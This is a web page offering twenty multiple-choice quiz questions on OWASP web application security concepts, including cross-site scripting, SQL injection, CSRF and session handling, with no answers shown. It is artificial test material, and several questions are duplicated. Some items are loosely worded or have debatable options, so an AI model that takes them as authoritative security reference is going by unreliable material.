OWASP MCQs
OWASP MCQs
Try to answer these OWASP MCQs and check your understanding of the OWASP subject.
Scroll down and let's begin!
1: Which attack can execute scripts in the user’s browser and is capable of hijacking user sessions, defacing websites or redirecting the user to malicious sites.
A. SQL Injection
B. Cross site scripting.
C. Malware Uploading
D. Man in the middle
2: For an an indirect reference, what happens if there’s no list of limited values authorized for a user in the direct reference?
A. Brute Forcing of stored encrypted credentials
B. SQL Injection
C. XML Injection
D. Access to sensitive data possible
3: What is the attack technique used to exploit web sites by altering backend database queries through inputting manipulated queries?
A. SQL Injection
B. XML Injection
C. Cross Site Request Forgery
D. OS Commanding
4: What flaw can lead to exposure of resources or functionality to unintended actors?
A. Session Fixation
B. Unvalidated Redirects and Forwards
C. Insecure Cryptographic Storage
D. Improper Authentication
5: For every link or form which invoke state-changing functions with an unpredictable token for each user what attack can be prevented?
A. Cross Site Scripting
B. Cross Site Tracing
C. Cross Site Request Forgery
D. OS Commanding
6: Which threat can be prevented by having unique usernames generated with a high degree of entropy?
A. Authentication bypass
B. Crypt-analysis of hash values
C. Spamming
D. Authorization Bypass
7: What happens when an application takes user inputted data and sends it to a web browser without proper validation and escaping?
A. Security Misconfiguration
B. Broken Authentication and Session Management
C. Cross Site Scripting
D. Insecure Direct Object References
8: What is phishing?
A. Cross domain scandal
B. Data transfer protocol
C. Email Scam
D. Network scandal
9: Network permissions should be established so that users can accomplish their tasks, but cannot access any system resources that are not necessary so that
A. Users will not have access to and misuse system resources
B. A hacker cannot steal a legitimate user's identity
C. Only the resources authorized for that user will be at risk
D. Hackers will not pose as legitimate users
10: What is a cookie
A. A file that makes it easier to access a Web site and browse
B. A computer virus
C. A file that hackers use to steal your identity
D. Web application file
11: We can allow client side scripts to execute in the browsers for needed operations.
A. True
B. False
12: An attack technique that forces a user's session credential or session ID to an explicit value.
A. Session Hijacking
B. Session Fixation
C. Brute Force Attack
D. Dictionary Attack
13: What flaw can lead to exposure of resources or functionality to unintended actor?
A. Unvalidated Redirects and Forwards
B. Session Fixation
C. Improper Authentication
D. Insecure Cryptographic Storage
14: An IP Address is the Internet equivalent of
A. Your mailing address
B. Your Birth Date
C. Your social security number
D. Your modem configuration number
15: What flaw arises from session tokens having poor randomness across a range of values?
A. Insecure Direct Object References
B. Session Fixation
C. Session Replay
D. Session Hijacking
16: Attack that exploits the trust that a site has in a user's browser
A. Cross Site Request Forgery
B. Session Hijacking
C. SQL Injection
D. Cross Site Scripting
17: For the every link or form which invoke state changing functions with an unpredictable token for each user what attack can be prevented?
A. Cross Site Tracing
B. OS Commanding
C. Cross Site Scripting
D. Cross Site Request Forgery
18: For an indirect reference, what happens if there's no list of limited values authorized for a user in the direct reference?
A. Access to sensitive data possible
B. SQL Injection
C. XML Injection
D. Brute Forcing of stored encrypted credentials
19: What threat arises from not flagging HTTP cookies with tokens as secure?
A. Session Hijacking
B. Session Replay
C. Insecure Cryptographic Storage
D. Access Control Violation
20: For a connection that changes from HTTP to HTTPS, what flaw arises if you do not change the session identifier?
A. Session Hijacking
B. Cross Site Request Forgery
C. Cross Site Scripting
D. Session Replay
List of OWASP MCQs Multiple Ch...
Available in:
OWASP MCQs
